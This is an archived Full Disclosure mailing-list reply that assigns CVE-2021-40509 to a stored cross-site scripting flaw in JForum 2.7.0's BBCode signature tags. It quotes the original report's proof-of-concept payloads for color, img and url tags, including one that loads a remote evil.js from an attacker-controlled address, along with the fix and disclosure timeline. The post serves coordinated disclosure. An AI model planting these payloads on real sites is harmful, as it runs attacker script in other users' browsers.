[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <YTcYa0gBMrGw66J0@ryzen.bugs.fi>
Date: Tue, 7 Sep 2021 10:44:43 +0300
From: Henri Salo <henri@...v.fi>
To: fulldisclosure@...lists.org
Subject: Re: [FD] a xss vulnerability in Jforum 2.7.0
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
On Thu, Sep 02, 2021 at 04:55:24PM +0800, kun song wrote:
> hi,
>
> I found a vulnerability in the jforum 2.7.0. It is a storage cross site
> script vulnerability. The place is the user's profile - signature. The
> technique of the vulnerability is the same as that described in this
> article "STORED CROSS SITE SCRIPTING IN BBCODE" (
> https://mindedsecurity.com/advisories/msa130510/), and the POC is:
>
> color tag:
> [color=red" onMouseOver="alert('xss')]XSS[/color]
> [color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js')
> ;"]XSS[/color]
> Renders into HTML:
> <font onmouseover="alert('xss')" color="red">XSS</font>
> <font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js');"
> color="red">XSS</font>
>
> img tag:
> [img]/demo.jpg" onMouseOver="alert('xss')[/img]
> Renders into HTML:
> <img src="/demo.jpg" onmouseover="alert('xss')" alt="image">
>
> url= tag:
> [url='http://www.demo.com" onMouseOver="alert('xss')']test[/url]
> Renders into HTML:
> <a class="snap_shots" href="http://www.demo.com" onmouseover="alert('xss')"
> target="_blank">test</a>
>
> through analysis, the forum has set the cookie to http-only, but the
> attacker can use the $.getScript to do some evil things.
>
> this vulnerability has been fixed in
> https://sourceforge.net/p/jforum2/code/934/ .
>
> timeline:
> 2021-04-21 announce the developer of Jforum by e-mail
> 2021-04-22 Jforum fixed the vulnerability, and will include this fix in
> next release
> 2021-09-02 send this mail to bugtraq&fulldisclosure
CVE-2021-40509 has been assigned for this vulnerability.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40509
- --
Henri Salo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEE/aVSDznAZReWTkxKJ633pE6qdXQFAmE3GGgACgkQJ633pE6q
dXRbUA//fgeWQCIQzYDgZ6venNplzRBsCamTVWK2miur4NjIqKFtza4namiEn1GK
9+Fw4llZdmcdLV2iE5HVo1EPwg1RKgKqEFWlat8cLNWyzPFazh3Mv8gJgAAPnfgB
HdODZGE8cXnTZ2nK1FZqTtGbh7vTcs9AlWzpEwZgZs+BzWzX6VO/gxC2iQcA4ePq
6/xKsUbO46SKZpZ+pZt45V9r4EcibgU69cXwtPeywE2NRjlM9VsReWz+p3CVR3Sv
px6mK3G4sjyHyPIhkDwVMwUziPT5FfLuAPYI6VEweMsCUgyUfj48xu+pmTYwCQ1R
8LSjllEU2qsGvs0oMGs7AEp5T1c/kDP7xgS761gUivjl1J//szu+QScC0jKYVdEX
DWp672UpzB3F4xsMTeQu7U7zq+NRS2ySNs3gB2cvqsjS8lDIMdrnThqZny/K7jhC
TCrfTYDTsej1jlMWR3mTiFIhNNhPPoSg+Opab1wnqQwO3JIE9xVqNNTsyIH+aCMK
jUlZZAbJwfb3WNJMJHI+9gxh1XgLf5NhgsSlzSpWcnM/soXOYzi3EdYlvuc0cTQ7
X3082dHC7A2Y1Lm9fTqvwsQ+BGV0rR8FxhwAfqweNz7AH5rAIbalj+mVFweSaUU/
k2Vd4Jt8QjfmzaTMMpLxUPjA3vlaIBxYnz/T33chZ119PRG9vNc=
=fWS4
-----END PGP SIGNATURE-----
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists